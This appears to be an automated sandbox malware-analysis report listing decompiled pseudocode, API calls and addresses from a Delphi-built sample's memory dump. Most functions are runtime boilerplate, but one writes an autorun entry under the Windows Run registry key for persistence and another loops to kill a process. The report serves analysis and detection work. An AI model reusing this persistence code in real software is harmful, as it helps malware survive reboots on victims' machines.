    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
